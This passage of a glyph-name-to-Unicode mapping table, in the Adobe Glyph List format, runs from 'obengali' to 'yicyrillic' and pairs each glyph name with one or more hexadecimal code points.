obengali;0993
obopomofo;311B
obreve;014F
ocandradeva;0911
ocandragujarati;0A91
ocandravowelsigndeva;0949
ocandravowelsigngujarati;0AC9
ocaron;01D2
ocircle;24DE
ocircumflex;00F4
ocircumflexacute;1ED1
ocircumflexdotbelow;1ED9
ocircumflexgrave;1ED3
ocircumflexhookabove;1ED5
ocircumflextilde;1ED7
ocyrillic;043E
odblacute;0151
odblgrave;020D
odeva;0913
odieresis;00F6
odieresiscyrillic;04E7
odotbelow;1ECD
oe;0153
oekorean;315A
ogonek;02DB
ogonekcmb;0328
ograve;00F2
ogujarati;0A93
oharmenian;0585
ohiragana;304A
ohookabove;1ECF
ohorn;01A1
ohornacute;1EDB
ohorndotbelow;1EE3
ohorngrave;1EDD
ohornhookabove;1EDF
ohorntilde;1EE1
ohungarumlaut;0151
oi;01A3
oinvertedbreve;020F
okatakana;30AA
okatakanahalfwidth;FF75
okorean;3157
olehebrew;05AB
omacron;014D
omacronacute;1E53
omacrongrave;1E51
omdeva;0950
omega;03C9
omega1;03D6
omegacyrillic;0461
omegalatinclosed;0277
omegaroundcyrillic;047B
omegatitlocyrillic;047D
omegatonos;03CE
omgujarati;0AD0
omicron;03BF
omicrontonos;03CC
omonospace;FF4F
one;0031
onearabic;0661
onebengali;09E7
onecircle;2460
onecircleinversesansserif;278A
onedeva;0967
onedotenleader;2024
oneeighth;215B
onefitted;F6DC
onegujarati;0AE7
onegurmukhi;0A67
onehackarabic;0661
onehalf;00BD
onehangzhou;3021
oneideographicparen;3220
oneinferior;2081
onemonospace;FF11
onenumeratorbengali;09F4
oneoldstyle;F731
oneparen;2474
oneperiod;2488
onepersian;06F1
onequarter;00BC
oneroman;2170
onesuperior;00B9
onethai;0E51
onethird;2153
oogonek;01EB
oogonekmacron;01ED
oogurmukhi;0A13
oomatragurmukhi;0A4B
oopen;0254
oparen;24AA
openbullet;25E6
option;2325
ordfeminine;00AA
ordmasculine;00BA
orthogonal;221F
oshortdeva;0912
oshortvowelsigndeva;094A
oslash;00F8
oslashacute;01FF
osmallhiragana;3049
osmallkatakana;30A9
osmallkatakanahalfwidth;FF6B
ostrokeacute;01FF
osuperior;F6F0
otcyrillic;047F
otilde;00F5
otildeacute;1E4D
otildedieresis;1E4F
oubopomofo;3121
overline;203E
overlinecenterline;FE4A
overlinecmb;0305
overlinedashed;FE49
overlinedblwavy;FE4C
overlinewavy;FE4B
overscore;00AF
ovowelsignbengali;09CB
ovowelsigndeva;094B
ovowelsigngujarati;0ACB
p;0070
paampssquare;3380
paasentosquare;332B
pabengali;09AA
pacute;1E55
padeva;092A
pagedown;21DF
pageup;21DE
pagujarati;0AAA
pagurmukhi;0A2A
pahiragana;3071
paiyannoithai;0E2F
pakatakana;30D1
palatalizationcyrilliccmb;0484
palochkacyrillic;04C0
pansioskorean;317F
paragraph;00B6
parallel;2225
parenleft;0028
parenleftaltonearabic;FD3E
parenleftbt;F8ED
parenleftex;F8EC
parenleftinferior;208D
parenleftmonospace;FF08
parenleftsmall;FE59
parenleftsuperior;207D
parenlefttp;F8EB
parenleftvertical;FE35
parenright;0029
parenrightaltonearabic;FD3F
parenrightbt;F8F8
parenrightex;F8F7
parenrightinferior;208E
parenrightmonospace;FF09
parenrightsmall;FE5A
parenrightsuperior;207E
parenrighttp;F8F6
parenrightvertical;FE36
partialdiff;2202
paseqhebrew;05C0
pashtahebrew;0599
pasquare;33A9
patah;05B7
patah11;05B7
patah1d;05B7
patah2a;05B7
patahhebrew;05B7
patahnarrowhebrew;05B7
patahquarterhebrew;05B7
patahwidehebrew;05B7
pazerhebrew;05A1
pbopomofo;3106
pcircle;24DF
pdotaccent;1E57
pe;05E4
pecyrillic;043F
pedagesh;FB44
pedageshhebrew;FB44
peezisquare;333B
pefinaldageshhebrew;FB43
peharabic;067E
peharmenian;057A
pehebrew;05E4
pehfinalarabic;FB57
pehinitialarabic;FB58
pehiragana;307A
pehmedialarabic;FB59
pekatakana;30DA
pemiddlehookcyrillic;04A7
perafehebrew;FB4E
percent;0025
percentarabic;066A
percentmonospace;FF05
percentsmall;FE6A
period;002E
periodarmenian;0589
periodcentered;00B7
periodhalfwidth;FF61
periodinferior;F6E7
periodmonospace;FF0E
periodsmall;FE52
periodsuperior;F6E8
perispomenigreekcmb;0342
perpendicular;22A5
perthousand;2030
peseta;20A7
pfsquare;338A
phabengali;09AB
phadeva;092B
phagujarati;0AAB
phagurmukhi;0A2B
phi;03C6
phi1;03D5
phieuphacirclekorean;327A
phieuphaparenkorean;321A
phieuphcirclekorean;326C
phieuphkorean;314D
phieuphparenkorean;320C
philatin;0278
phinthuthai;0E3A
phisymbolgreek;03D5
phook;01A5
phophanthai;0E1E
phophungthai;0E1C
phosamphaothai;0E20
pi;03C0
pieupacirclekorean;3273
pieupaparenkorean;3213
pieupcieuckorean;3176
pieupcirclekorean;3265
pieupkiyeokkorean;3172
pieupkorean;3142
pieupparenkorean;3205
pieupsioskiyeokkorean;3174
pieupsioskorean;3144
pieupsiostikeutkorean;3175
pieupthieuthkorean;3177
pieuptikeutkorean;3173
pihiragana;3074
pikatakana;30D4
pisymbolgreek;03D6
piwrarmenian;0583
plus;002B
plusbelowcmb;031F
pluscircle;2295
plusminus;00B1
plusmod;02D6
plusmonospace;FF0B
plussmall;FE62
plussuperior;207A
pmonospace;FF50
pmsquare;33D8
pohiragana;307D
pointingindexdownwhite;261F
pointingindexleftwhite;261C
pointingindexrightwhite;261E
pointingindexupwhite;261D
pokatakana;30DD
poplathai;0E1B
postalmark;3012
postalmarkface;3020
pparen;24AB
precedes;227A
prescription;211E
primemod;02B9
primereversed;2035
product;220F
projective;2305
prolongedkana;30FC
propellor;2318
propersubset;2282
propersuperset;2283
proportion;2237
proportional;221D
psi;03C8
psicyrillic;0471
psilipneumatacyrilliccmb;0486
pssquare;33B0
puhiragana;3077
pukatakana;30D7
pvsquare;33B4
pwsquare;33BA
q;0071
qadeva;0958
qadmahebrew;05A8
qafarabic;0642
qaffinalarabic;FED6
qafinitialarabic;FED7
qafmedialarabic;FED8
qamats;05B8
qamats10;05B8
qamats1a;05B8
qamats1c;05B8
qamats27;05B8
qamats29;05B8
qamats33;05B8
qamatsde;05B8
qamatshebrew;05B8
qamatsnarrowhebrew;05B8
qamatsqatanhebrew;05B8
qamatsqatannarrowhebrew;05B8
qamatsqatanquarterhebrew;05B8
qamatsqatanwidehebrew;05B8
qamatsquarterhebrew;05B8
qamatswidehebrew;05B8
qarneyparahebrew;059F
qbopomofo;3111
qcircle;24E0
qhook;02A0
qmonospace;FF51
qof;05E7
qofdagesh;FB47
qofdageshhebrew;FB47
qofhatafpatah;05E7 05B2
qofhatafpatahhebrew;05E7 05B2
qofhatafsegol;05E7 05B1
qofhatafsegolhebrew;05E7 05B1
qofhebrew;05E7
qofhiriq;05E7 05B4
qofhiriqhebrew;05E7 05B4
qofholam;05E7 05B9
qofholamhebrew;05E7 05B9
qofpatah;05E7 05B7
qofpatahhebrew;05E7 05B7
qofqamats;05E7 05B8
qofqamatshebrew;05E7 05B8
qofqubuts;05E7 05BB
qofqubutshebrew;05E7 05BB
qofsegol;05E7 05B6
qofsegolhebrew;05E7 05B6
qofsheva;05E7 05B0
qofshevahebrew;05E7 05B0
qoftsere;05E7 05B5
qoftserehebrew;05E7 05B5
qparen;24AC
quarternote;2669
qubuts;05BB
qubuts18;05BB
qubuts25;05BB
qubuts31;05BB
qubutshebrew;05BB
qubutsnarrowhebrew;05BB
qubutsquarterhebrew;05BB
qubutswidehebrew;05BB
question;003F
questionarabic;061F
questionarmenian;055E
questiondown;00BF
questiondownsmall;F7BF
questiongreek;037E
questionmonospace;FF1F
questionsmall;F73F
quotedbl;0022
quotedblbase;201E
quotedblleft;201C
quotedblmonospace;FF02
quotedblprime;301E
quotedblprimereversed;301D
quotedblright;201D
quoteleft;2018
quoteleftreversed;201B
quotereversed;201B
quoteright;2019
quoterightn;0149
quotesinglbase;201A
quotesingle;0027
quotesinglemonospace;FF07
r;0072
raarmenian;057C
rabengali;09B0
racute;0155
radeva;0930
radical;221A
radicalex;F8E5
radoverssquare;33AE
radoverssquaredsquare;33AF
radsquare;33AD
rafe;05BF
rafehebrew;05BF
ragujarati;0AB0
ragurmukhi;0A30
rahiragana;3089
rakatakana;30E9
rakatakanahalfwidth;FF97
ralowerdiagonalbengali;09F1
ramiddlediagonalbengali;09F0
ramshorn;0264
ratio;2236
rbopomofo;3116
rcaron;0159
rcedilla;0157
rcircle;24E1
rcommaaccent;0157
rdblgrave;0211
rdotaccent;1E59
rdotbelow;1E5B
rdotbelowmacron;1E5D
referencemark;203B
reflexsubset;2286
reflexsuperset;2287
registered;00AE
registersans;F8E8
registerserif;F6DA
reharabic;0631
reharmenian;0580
rehfinalarabic;FEAE
rehiragana;308C
rehyehaleflamarabic;0631 FEF3 FE8E 0644
rekatakana;30EC
rekatakanahalfwidth;FF9A
resh;05E8
reshdageshhebrew;FB48
reshhatafpatah;05E8 05B2
reshhatafpatahhebrew;05E8 05B2
reshhatafsegol;05E8 05B1
reshhatafsegolhebrew;05E8 05B1
reshhebrew;05E8
reshhiriq;05E8 05B4
reshhiriqhebrew;05E8 05B4
reshholam;05E8 05B9
reshholamhebrew;05E8 05B9
reshpatah;05E8 05B7
reshpatahhebrew;05E8 05B7
reshqamats;05E8 05B8
reshqamatshebrew;05E8 05B8
reshqubuts;05E8 05BB
reshqubutshebrew;05E8 05BB
reshsegol;05E8 05B6
reshsegolhebrew;05E8 05B6
reshsheva;05E8 05B0
reshshevahebrew;05E8 05B0
reshtsere;05E8 05B5
reshtserehebrew;05E8 05B5
reversedtilde;223D
reviahebrew;0597
reviamugrashhebrew;0597
revlogicalnot;2310
rfishhook;027E
rfishhookreversed;027F
rhabengali;09DD
rhadeva;095D
rho;03C1
rhook;027D
rhookturned;027B
rhookturnedsuperior;02B5
rhosymbolgreek;03F1
rhotichookmod;02DE
rieulacirclekorean;3271
rieulaparenkorean;3211
rieulcirclekorean;3263
rieulhieuhkorean;3140
rieulkiyeokkorean;313A
rieulkiyeoksioskorean;3169
rieulkorean;3139
rieulmieumkorean;313B
rieulpansioskorean;316C
rieulparenkorean;3203
rieulphieuphkorean;313F
rieulpieupkorean;313C
rieulpieupsioskorean;316B
rieulsioskorean;313D
rieulthieuthkorean;313E
rieultikeutkorean;316A
rieulyeorinhieuhkorean;316D
rightangle;221F
righttackbelowcmb;0319
righttriangle;22BF
rihiragana;308A
rikatakana;30EA
rikatakanahalfwidth;FF98
ring;02DA
ringbelowcmb;0325
ringcmb;030A
ringhalfleft;02BF
ringhalfleftarmenian;0559
ringhalfleftbelowcmb;031C
ringhalfleftcentered;02D3
ringhalfright;02BE
ringhalfrightbelowcmb;0339
ringhalfrightcentered;02D2
rinvertedbreve;0213
rittorusquare;3351
rlinebelow;1E5F
rlongleg;027C
rlonglegturned;027A
rmonospace;FF52
rohiragana;308D
rokatakana;30ED
rokatakanahalfwidth;FF9B
roruathai;0E23
rparen;24AD
rrabengali;09DC
rradeva;0931
rragurmukhi;0A5C
rreharabic;0691
rrehfinalarabic;FB8D
rrvocalicbengali;09E0
rrvocalicdeva;0960
rrvocalicgujarati;0AE0
rrvocalicvowelsignbengali;09C4
rrvocalicvowelsigndeva;0944
rrvocalicvowelsigngujarati;0AC4
rsuperior;F6F1
rtblock;2590
rturned;0279
rturnedsuperior;02B4
ruhiragana;308B
rukatakana;30EB
rukatakanahalfwidth;FF99
rupeemarkbengali;09F2
rupeesignbengali;09F3
rupiah;F6DD
ruthai;0E24
rvocalicbengali;098B
rvocalicdeva;090B
rvocalicgujarati;0A8B
rvocalicvowelsignbengali;09C3
rvocalicvowelsigndeva;0943
rvocalicvowelsigngujarati;0AC3
s;0073
sabengali;09B8
sacute;015B
sacutedotaccent;1E65
sadarabic;0635
sadeva;0938
sadfinalarabic;FEBA
sadinitialarabic;FEBB
sadmedialarabic;FEBC
sagujarati;0AB8
sagurmukhi;0A38
sahiragana;3055
sakatakana;30B5
sakatakanahalfwidth;FF7B
sallallahoualayhewasallamarabic;FDFA
samekh;05E1
samekhdagesh;FB41
samekhdageshhebrew;FB41
samekhhebrew;05E1
saraaathai;0E32
saraaethai;0E41
saraaimaimalaithai;0E44
saraaimaimuanthai;0E43
saraamthai;0E33
saraathai;0E30
saraethai;0E40
saraiileftthai;F886
saraiithai;0E35
saraileftthai;F885
saraithai;0E34
saraothai;0E42
saraueeleftthai;F888
saraueethai;0E37
saraueleftthai;F887
sarauethai;0E36
sarauthai;0E38
sarauuthai;0E39
sbopomofo;3119
scaron;0161
scarondotaccent;1E67
scedilla;015F
schwa;0259
schwacyrillic;04D9
schwadieresiscyrillic;04DB
schwahook;025A
scircle;24E2
scircumflex;015D
scommaaccent;0219
sdotaccent;1E61
sdotbelow;1E63
sdotbelowdotaccent;1E69
seagullbelowcmb;033C
second;2033
secondtonechinese;02CA
section;00A7
seenarabic;0633
seenfinalarabic;FEB2
seeninitialarabic;FEB3
seenmedialarabic;FEB4
segol;05B6
segol13;05B6
segol1f;05B6
segol2c;05B6
segolhebrew;05B6
segolnarrowhebrew;05B6
segolquarterhebrew;05B6
segoltahebrew;0592
segolwidehebrew;05B6
seharmenian;057D
sehiragana;305B
sekatakana;30BB
sekatakanahalfwidth;FF7E
semicolon;003B
semicolonarabic;061B
semicolonmonospace;FF1B
semicolonsmall;FE54
semivoicedmarkkana;309C
semivoicedmarkkanahalfwidth;FF9F
sentisquare;3322
sentosquare;3323
seven;0037
sevenarabic;0667
sevenbengali;09ED
sevencircle;2466
sevencircleinversesansserif;2790
sevendeva;096D
seveneighths;215E
sevengujarati;0AED
sevengurmukhi;0A6D
sevenhackarabic;0667
sevenhangzhou;3027
sevenideographicparen;3226
seveninferior;2087
sevenmonospace;FF17
sevenoldstyle;F737
sevenparen;247A
sevenperiod;248E
sevenpersian;06F7
sevenroman;2176
sevensuperior;2077
seventeencircle;2470
seventeenparen;2484
seventeenperiod;2498
seventhai;0E57
sfthyphen;00AD
shaarmenian;0577
shabengali;09B6
shacyrillic;0448
shaddaarabic;0651
shaddadammaarabic;FC61
shaddadammatanarabic;FC5E
shaddafathaarabic;FC60
shaddafathatanarabic;0651 064B
shaddakasraarabic;FC62
shaddakasratanarabic;FC5F
shade;2592
shadedark;2593
shadelight;2591
shademedium;2592
shadeva;0936
shagujarati;0AB6
shagurmukhi;0A36
shalshelethebrew;0593
shbopomofo;3115
shchacyrillic;0449
sheenarabic;0634
sheenfinalarabic;FEB6
sheeninitialarabic;FEB7
sheenmedialarabic;FEB8
sheicoptic;03E3
sheqel;20AA
sheqelhebrew;20AA
sheva;05B0
sheva115;05B0
sheva15;05B0
sheva22;05B0
sheva2e;05B0
shevahebrew;05B0
shevanarrowhebrew;05B0
shevaquarterhebrew;05B0
shevawidehebrew;05B0
shhacyrillic;04BB
shimacoptic;03ED
shin;05E9
shindagesh;FB49
shindageshhebrew;FB49
shindageshshindot;FB2C
shindageshshindothebrew;FB2C
shindageshsindot;FB2D
shindageshsindothebrew;FB2D
shindothebrew;05C1
shinhebrew;05E9
shinshindot;FB2A
shinshindothebrew;FB2A
shinsindot;FB2B
shinsindothebrew;FB2B
shook;0282
sigma;03C3
sigma1;03C2
sigmafinal;03C2
sigmalunatesymbolgreek;03F2
sihiragana;3057
sikatakana;30B7
sikatakanahalfwidth;FF7C
siluqhebrew;05BD
siluqlefthebrew;05BD
similar;223C
sindothebrew;05C2
siosacirclekorean;3274
siosaparenkorean;3214
sioscieuckorean;317E
sioscirclekorean;3266
sioskiyeokkorean;317A
sioskorean;3145
siosnieunkorean;317B
siosparenkorean;3206
siospieupkorean;317D
siostikeutkorean;317C
six;0036
sixarabic;0666
sixbengali;09EC
sixcircle;2465
sixcircleinversesansserif;278F
sixdeva;096C
sixgujarati;0AEC
sixgurmukhi;0A6C
sixhackarabic;0666
sixhangzhou;3026
sixideographicparen;3225
sixinferior;2086
sixmonospace;FF16
sixoldstyle;F736
sixparen;2479
sixperiod;248D
sixpersian;06F6
sixroman;2175
sixsuperior;2076
sixteencircle;246F
sixteencurrencydenominatorbengali;09F9
sixteenparen;2483
sixteenperiod;2497
sixthai;0E56
slash;002F
slashmonospace;FF0F
slong;017F
slongdotaccent;1E9B
smileface;263A
smonospace;FF53
sofpasuqhebrew;05C3
softhyphen;00AD
softsigncyrillic;044C
sohiragana;305D
sokatakana;30BD
sokatakanahalfwidth;FF7F
soliduslongoverlaycmb;0338
solidusshortoverlaycmb;0337
sorusithai;0E29
sosalathai;0E28
sosothai;0E0B
sosuathai;0E2A
space;0020
spacehackarabic;0020
spade;2660
spadesuitblack;2660
spadesuitwhite;2664
sparen;24AE
squarebelowcmb;033B
squarecc;33C4
squarecm;339D
squarediagonalcrosshatchfill;25A9
squarehorizontalfill;25A4
squarekg;338F
squarekm;339E
squarekmcapital;33CE
squareln;33D1
squarelog;33D2
squaremg;338E
squaremil;33D5
squaremm;339C
squaremsquared;33A1
squareorthogonalcrosshatchfill;25A6
squareupperlefttolowerrightfill;25A7
squareupperrighttolowerleftfill;25A8
squareverticalfill;25A5
squarewhitewithsmallblack;25A3
srsquare;33DB
ssabengali;09B7
ssadeva;0937
ssagujarati;0AB7
ssangcieuckorean;3149
ssanghieuhkorean;3185
ssangieungkorean;3180
ssangkiyeokkorean;3132
ssangnieunkorean;3165
ssangpieupkorean;3143
ssangsioskorean;3146
ssangtikeutkorean;3138
ssuperior;F6F2
sterling;00A3
sterlingmonospace;FFE1
strokelongoverlaycmb;0336
strokeshortoverlaycmb;0335
subset;2282
subsetnotequal;228A
subsetorequal;2286
succeeds;227B
suchthat;220B
suhiragana;3059
sukatakana;30B9
sukatakanahalfwidth;FF7D
sukunarabic;0652
summation;2211
sun;263C
superset;2283
supersetnotequal;228B
supersetorequal;2287
svsquare;33DC
syouwaerasquare;337C
t;0074
tabengali;09A4
tackdown;22A4
tackleft;22A3
tadeva;0924
tagujarati;0AA4
tagurmukhi;0A24
taharabic;0637
tahfinalarabic;FEC2
tahinitialarabic;FEC3
tahiragana;305F
tahmedialarabic;FEC4
taisyouerasquare;337D
takatakana;30BF
takatakanahalfwidth;FF80
tatweelarabic;0640
tau;03C4
tav;05EA
tavdages;FB4A
tavdagesh;FB4A
tavdageshhebrew;FB4A
tavhebrew;05EA
tbar;0167
tbopomofo;310A
tcaron;0165
tccurl;02A8
tcedilla;0163
tcheharabic;0686
tchehfinalarabic;FB7B
tchehinitialarabic;FB7C
tchehmedialarabic;FB7D
tchehmeeminitialarabic;FB7C FEE4
tcircle;24E3
tcircumflexbelow;1E71
tcommaaccent;0163
tdieresis;1E97
tdotaccent;1E6B
tdotbelow;1E6D
tecyrillic;0442
tedescendercyrillic;04AD
teharabic;062A
tehfinalarabic;FE96
tehhahinitialarabic;FCA2
tehhahisolatedarabic;FC0C
tehinitialarabic;FE97
tehiragana;3066
tehjeeminitialarabic;FCA1
tehjeemisolatedarabic;FC0B
tehmarbutaarabic;0629
tehmarbutafinalarabic;FE94
tehmedialarabic;FE98
tehmeeminitialarabic;FCA4
tehmeemisolatedarabic;FC0E
tehnoonfinalarabic;FC73
tekatakana;30C6
tekatakanahalfwidth;FF83
telephone;2121
telephoneblack;260E
telishagedolahebrew;05A0
telishaqetanahebrew;05A9
tencircle;2469
tenideographicparen;3229
tenparen;247D
tenperiod;2491
tenroman;2179
tesh;02A7
tet;05D8
tetdagesh;FB38
tetdageshhebrew;FB38
tethebrew;05D8
tetsecyrillic;04B5
tevirhebrew;059B
tevirlefthebrew;059B
thabengali;09A5
thadeva;0925
thagujarati;0AA5
thagurmukhi;0A25
thalarabic;0630
thalfinalarabic;FEAC
thanthakhatlowleftthai;F898
thanthakhatlowrightthai;F897
thanthakhatthai;0E4C
thanthakhatupperleftthai;F896
theharabic;062B
thehfinalarabic;FE9A
thehinitialarabic;FE9B
thehmedialarabic;FE9C
thereexists;2203
therefore;2234
theta;03B8
theta1;03D1
thetasymbolgreek;03D1
thieuthacirclekorean;3279
thieuthaparenkorean;3219
thieuthcirclekorean;326B
thieuthkorean;314C
thieuthparenkorean;320B
thirteencircle;246C
thirteenparen;2480
thirteenperiod;2494
thonangmonthothai;0E11
thook;01AD
thophuthaothai;0E12
thorn;00FE
thothahanthai;0E17
thothanthai;0E10
thothongthai;0E18
thothungthai;0E16
thousandcyrillic;0482
thousandsseparatorarabic;066C
thousandsseparatorpersian;066C
three;0033
threearabic;0663
threebengali;09E9
threecircle;2462
threecircleinversesansserif;278C
threedeva;0969
threeeighths;215C
threegujarati;0AE9
threegurmukhi;0A69
threehackarabic;0663
threehangzhou;3023
threeideographicparen;3222
threeinferior;2083
threemonospace;FF13
threenumeratorbengali;09F6
threeoldstyle;F733
threeparen;2476
threeperiod;248A
threepersian;06F3
threequarters;00BE
threequartersemdash;F6DE
threeroman;2172
threesuperior;00B3
threethai;0E53
thzsquare;3394
tihiragana;3061
tikatakana;30C1
tikatakanahalfwidth;FF81
tikeutacirclekorean;3270
tikeutaparenkorean;3210
tikeutcirclekorean;3262
tikeutkorean;3137
tikeutparenkorean;3202
tilde;02DC
tildebelowcmb;0330
tildecmb;0303
tildecomb;0303
tildedoublecmb;0360
tildeoperator;223C
tildeoverlaycmb;0334
tildeverticalcmb;033E
timescircle;2297
tipehahebrew;0596
tipehalefthebrew;0596
tippigurmukhi;0A70
titlocyrilliccmb;0483
tiwnarmenian;057F
tlinebelow;1E6F
tmonospace;FF54
toarmenian;0569
tohiragana;3068
tokatakana;30C8
tokatakanahalfwidth;FF84
tonebarextrahighmod;02E5
tonebarextralowmod;02E9
tonebarhighmod;02E6
tonebarlowmod;02E8
tonebarmidmod;02E7
tonefive;01BD
tonesix;0185
tonetwo;01A8
tonos;0384
tonsquare;3327
topatakthai;0E0F
tortoiseshellbracketleft;3014
tortoiseshellbracketleftsmall;FE5D
tortoiseshellbracketleftvertical;FE39
tortoiseshellbracketright;3015
tortoiseshellbracketrightsmall;FE5E
tortoiseshellbracketrightvertical;FE3A
totaothai;0E15
tpalatalhook;01AB
tparen;24AF
trademark;2122
trademarksans;F8EA
trademarkserif;F6DB
tretroflexhook;0288
triagdn;25BC
triaglf;25C4
triagrt;25BA
triagup;25B2
ts;02A6
tsadi;05E6
tsadidagesh;FB46
tsadidageshhebrew;FB46
tsadihebrew;05E6
tsecyrillic;0446
tsere;05B5
tsere12;05B5
tsere1e;05B5
tsere2b;05B5
tserehebrew;05B5
tserenarrowhebrew;05B5
tserequarterhebrew;05B5
tserewidehebrew;05B5
tshecyrillic;045B
tsuperior;F6F3
ttabengali;099F
ttadeva;091F
ttagujarati;0A9F
ttagurmukhi;0A1F
tteharabic;0679
ttehfinalarabic;FB67
ttehinitialarabic;FB68
ttehmedialarabic;FB69
tthabengali;09A0
tthadeva;0920
tthagujarati;0AA0
tthagurmukhi;0A20
tturned;0287
tuhiragana;3064
tukatakana;30C4
tukatakanahalfwidth;FF82
tusmallhiragana;3063
tusmallkatakana;30C3
tusmallkatakanahalfwidth;FF6F
twelvecircle;246B
twelveparen;247F
twelveperiod;2493
twelveroman;217B
twentycircle;2473
twentyhangzhou;5344
twentyparen;2487
twentyperiod;249B
two;0032
twoarabic;0662
twobengali;09E8
twocircle;2461
twocircleinversesansserif;278B
twodeva;0968
twodotenleader;2025
twodotleader;2025
twodotleadervertical;FE30
twogujarati;0AE8
twogurmukhi;0A68
twohackarabic;0662
twohangzhou;3022
twoideographicparen;3221
twoinferior;2082
twomonospace;FF12
twonumeratorbengali;09F5
twooldstyle;F732
twoparen;2475
twoperiod;2489
twopersian;06F2
tworoman;2171
twostroke;01BB
twosuperior;00B2
twothai;0E52
twothirds;2154
u;0075
uacute;00FA
ubar;0289
ubengali;0989
ubopomofo;3128
ubreve;016D
ucaron;01D4
ucircle;24E4
ucircumflex;00FB
ucircumflexbelow;1E77
ucyrillic;0443
udattadeva;0951
udblacute;0171
udblgrave;0215
udeva;0909
udieresis;00FC
udieresisacute;01D8
udieresisbelow;1E73
udieresiscaron;01DA
udieresiscyrillic;04F1
udieresisgrave;01DC
udieresismacron;01D6
udotbelow;1EE5
ugrave;00F9
ugujarati;0A89
ugurmukhi;0A09
uhiragana;3046
uhookabove;1EE7
uhorn;01B0
uhornacute;1EE9
uhorndotbelow;1EF1
uhorngrave;1EEB
uhornhookabove;1EED
uhorntilde;1EEF
uhungarumlaut;0171
uhungarumlautcyrillic;04F3
uinvertedbreve;0217
ukatakana;30A6
ukatakanahalfwidth;FF73
ukcyrillic;0479
ukorean;315C
umacron;016B
umacroncyrillic;04EF
umacrondieresis;1E7B
umatragurmukhi;0A41
umonospace;FF55
underscore;005F
underscoredbl;2017
underscoremonospace;FF3F
underscorevertical;FE33
underscorewavy;FE4F
union;222A
universal;2200
uogonek;0173
uparen;24B0
upblock;2580
upperdothebrew;05C4
upsilon;03C5
upsilondieresis;03CB
upsilondieresistonos;03B0
upsilonlatin;028A
upsilontonos;03CD
uptackbelowcmb;031D
uptackmod;02D4
uragurmukhi;0A73
uring;016F
ushortcyrillic;045E
usmallhiragana;3045
usmallkatakana;30A5
usmallkatakanahalfwidth;FF69
ustraightcyrillic;04AF
ustraightstrokecyrillic;04B1
utilde;0169
utildeacute;1E79
utildebelow;1E75
uubengali;098A
uudeva;090A
uugujarati;0A8A
uugurmukhi;0A0A
uumatragurmukhi;0A42
uuvowelsignbengali;09C2
uuvowelsigndeva;0942
uuvowelsigngujarati;0AC2
uvowelsignbengali;09C1
uvowelsigndeva;0941
uvowelsigngujarati;0AC1
v;0076
vadeva;0935
vagujarati;0AB5
vagurmukhi;0A35
vakatakana;30F7
vav;05D5
vavdagesh;FB35
vavdagesh65;FB35
vavdageshhebrew;FB35
vavhebrew;05D5
vavholam;FB4B
vavholamhebrew;FB4B
vavvavhebrew;05F0
vavyodhebrew;05F1
vcircle;24E5
vdotbelow;1E7F
vecyrillic;0432
veharabic;06A4
vehfinalarabic;FB6B
vehinitialarabic;FB6C
vehmedialarabic;FB6D
vekatakana;30F9
venus;2640
verticalbar;007C
verticallineabovecmb;030D
verticallinebelowcmb;0329
verticallinelowmod;02CC
verticallinemod;02C8
vewarmenian;057E
vhook;028B
vikatakana;30F8
viramabengali;09CD
viramadeva;094D
viramagujarati;0ACD
visargabengali;0983
visargadeva;0903
visargagujarati;0A83
vmonospace;FF56
voarmenian;0578
voicediterationhiragana;309E
voicediterationkatakana;30FE
voicedmarkkana;309B
voicedmarkkanahalfwidth;FF9E
vokatakana;30FA
vparen;24B1
vtilde;1E7D
vturned;028C
vuhiragana;3094
vukatakana;30F4
w;0077
wacute;1E83
waekorean;3159
wahiragana;308F
wakatakana;30EF
wakatakanahalfwidth;FF9C
wakorean;3158
wasmallhiragana;308E
wasmallkatakana;30EE
wattosquare;3357
wavedash;301C
wavyunderscorevertical;FE34
wawarabic;0648
wawfinalarabic;FEEE
wawhamzaabovearabic;0624
wawhamzaabovefinalarabic;FE86
wbsquare;33DD
wcircle;24E6
wcircumflex;0175
wdieresis;1E85
wdotaccent;1E87
wdotbelow;1E89
wehiragana;3091
weierstrass;2118
wekatakana;30F1
wekorean;315E
weokorean;315D
wgrave;1E81
whitebullet;25E6
whitecircle;25CB
whitecircleinverse;25D9
whitecornerbracketleft;300E
whitecornerbracketleftvertical;FE43
whitecornerbracketright;300F
whitecornerbracketrightvertical;FE44
whitediamond;25C7
whitediamondcontainingblacksmalldiamond;25C8
whitedownpointingsmalltriangle;25BF
whitedownpointingtriangle;25BD
whiteleftpointingsmalltriangle;25C3
whiteleftpointingtriangle;25C1
whitelenticularbracketleft;3016
whitelenticularbracketright;3017
whiterightpointingsmalltriangle;25B9
whiterightpointingtriangle;25B7
whitesmallsquare;25AB
whitesmilingface;263A
whitesquare;25A1
whitestar;2606
whitetelephone;260F
whitetortoiseshellbracketleft;3018
whitetortoiseshellbracketright;3019
whiteuppointingsmalltriangle;25B5
whiteuppointingtriangle;25B3
wihiragana;3090
wikatakana;30F0
wikorean;315F
wmonospace;FF57
wohiragana;3092
wokatakana;30F2
wokatakanahalfwidth;FF66
won;20A9
wonmonospace;FFE6
wowaenthai;0E27
wparen;24B2
wring;1E98
wsuperior;02B7
wturned;028D
wynn;01BF
x;0078
xabovecmb;033D
xbopomofo;3112
xcircle;24E7
xdieresis;1E8D
xdotaccent;1E8B
xeharmenian;056D
xi;03BE
xmonospace;FF58
xparen;24B3
xsuperior;02E3
y;0079
yaadosquare;334E
yabengali;09AF
yacute;00FD
yadeva;092F
yaekorean;3152
yagujarati;0AAF
yagurmukhi;0A2F
yahiragana;3084
yakatakana;30E4
yakatakanahalfwidth;FF94
yakorean;3151
yamakkanthai;0E4E
yasmallhiragana;3083
yasmallkatakana;30E3
yasmallkatakanahalfwidth;FF6C
yatcyrillic;0463
ycircle;24E8
ycircumflex;0177
ydieresis;00FF
ydotaccent;1E8F
ydotbelow;1EF5
yeharabic;064A
yehbarreearabic;06D2
yehbarreefinalarabic;FBAF
yehfinalarabic;FEF2
yehhamzaabovearabic;0626
yehhamzaabovefinalarabic;FE8A
yehhamzaaboveinitialarabic;FE8B
yehhamzaabovemedialarabic;FE8C
yehinitialarabic;FEF3
yehmedialarabic;FEF4
yehmeeminitialarabic;FCDD
yehmeemisolatedarabic;FC58
yehnoonfinalarabic;FC94
yehthreedotsbelowarabic;06D1
yekorean;3156
yen;00A5
yenmonospace;FFE5
yeokorean;3155
yeorinhieuhkorean;3186
yerahbenyomohebrew;05AA
yerahbenyomolefthebrew;05AA
yericyrillic;044B
yerudieresiscyrillic;04F9
yesieungkorean;3181
yesieungpansioskorean;3183
yesieungsioskorean;3182
yetivhebrew;059A
ygrave;1EF3
yhook;01B4
yhookabove;1EF7
yiarmenian;0575
yicyrillic;0457
